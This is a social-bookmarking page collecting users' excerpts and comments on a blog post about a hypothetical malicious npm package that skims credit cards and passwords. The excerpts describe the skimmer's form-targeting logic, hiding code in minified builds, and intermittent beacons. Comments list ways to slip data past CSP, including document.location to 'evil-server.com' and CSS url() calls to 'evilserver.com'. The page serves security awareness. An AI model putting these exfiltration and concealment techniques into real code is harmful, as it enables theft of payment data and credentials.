I’m harvesting credit card numbers and passwords from your site. Here’s how.


321 bookmarks. First posted by sptz45 january 2018.


The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
development  security  Bookmarks_Toolbar  From_Google_Chrome  Unsorted_Bookmarks  Other_Bookmarks 
5 days ago by marcusrelacion
The malicious code itself is very simple, it does its best work when it runs on a page that meets the following criteria:

The page has a <form>
an element matches input[type="password"] or name="cardnumber" or name="cvc" etc.
The page contains words like “credit card”, “checkout”, “login”, “password” etc.

Then, when there’s a blur event on a password/credit card field, or a form submit event is heard, my code:

Takes data from all form fields (document.forms.forEach(…)) on the ...
security  hacking  hacker  npm  best 
13 days ago by hellsten
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
javascript 
14 days ago by peterschussheim
You can still have your big ol’ React app with 938 npm packages for the header/footer/nav/whatever, but the part of the page where the user is typing should be in a secured iFrame and it should run only hand-crafted (and may I suggest, not-minified) JavaScript — if you want to do client-side validation.
javascript  npm  security 
14 days ago by spaceninja
RT : We knew that this was coming.
from twitter
14 days ago by leonsp
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems…
from instapaper
15 days ago by danielhill
RT : We knew that this was coming.
from twitter
15 days ago by hopeless
We knew that this was coming.
from twitter_favs
15 days ago by deathy
We knew that this was coming.
from twitter_favs
15 days ago by lchin
推荐一篇文章《如何通过 npm 窃取信用卡密码?》,讲述了作者通过 npm 发布恶意代码的种种手段。

其中有一个技巧,就是package.js 与 package.min.js 的代码不同,恶意代码只放在后者。
from twitter_favs
july 2018 by quake0day
Extremely legit concern.

Comments:

* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open(‘https://legit-analytics.com?q=${payload}', ‘_blank’).close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.

* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had little limitations to what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..

https://github.com/w3c/webappsec-csp/issues/92"

* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some css.
e.g. something::after { content:url(“evilserver.com/userdatastring”) }"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open-source  cool 
july 2018 by dandv
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
adam  package.json  npm 
july 2018 by blurback
Describes a speculative attack that CSP should help defend against.

n.b. this article also describes a variation using prefetch that can sneak past CSP.
csp  security  prefetch 
july 2018 by wrumsby
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new vulnerability.
Archive 
june 2018 by pesche
via Pocket - I’m harvesting credit card numbers and passwords from your site. Here’s how. - Added May 30, 2018 at 10:46PM
IFTTT  Pocket 
june 2018 by BastiRe
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new vulnerability.
may 2018 by gzhihao
😱 Read this blog post:

🙏 Now you know why you need this package in your app…
from twitter_favs
may 2018 by nigeljames
If an attacker successfully injects any code at all, it’s pretty much game over

Also the URL looks a lot like the 300 other requests to ad networks your site makes.

The point is, just because you don’t see it, doesn’t mean it’s not happening. It’s been more than two years and as far as I know, no one has ever noticed one of my requests. Maybe it’s been in your site this whole time :)

I only send these requests intermittently (about one in seven times, lightly randomised — the ideal trouble-shooting-insanity-inducing frequency).
cybersecurity  javascript  obfuscation  password  creditcard  fear  story  browser  plugin  malvertising 
may 2018 by bwiese
NPM as attack vector:
from twitter
march 2018 by brookr
Great article man.

var i = ‘gfudi’;
var k = s => s.split(‘’).map(c => String.fromCharCode(c.charCodeAt() — 1)).join(‘’);
Security  hacking  Javascript  Interview 
march 2018 by hackerzhut
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
web  security  javascript  npm  chrome  extensions  browser  extension 
march 2018 by nununo
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
security  javascript  webdev  hacks 
march 2018 by lucapostBo
RT : It's probably only a matter of time if it's not happening already.
from twitter_favs
february 2018 by bf4
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all.
Web_Security  Security  Computer_Security 
february 2018 by GameGamer43
The following is a true story. Or maybe it’s just based on a true story. Perhaps it’s not true at all. It’s been a frantic week of security scares — it seems like every day there’s a new…
maninthemiddle  security  data  harvesting  prevention 
february 2018 by gilberto5757
Lucky for me, we live in an age where people install npm packages like they’re popping pain killers.
security  javascript  node.js 
february 2018 by jbrewer999
This has been making the rounds but you should read it and then weep in a corner with the mess we've made.
from twitter_favs
january 2018 by pixelnated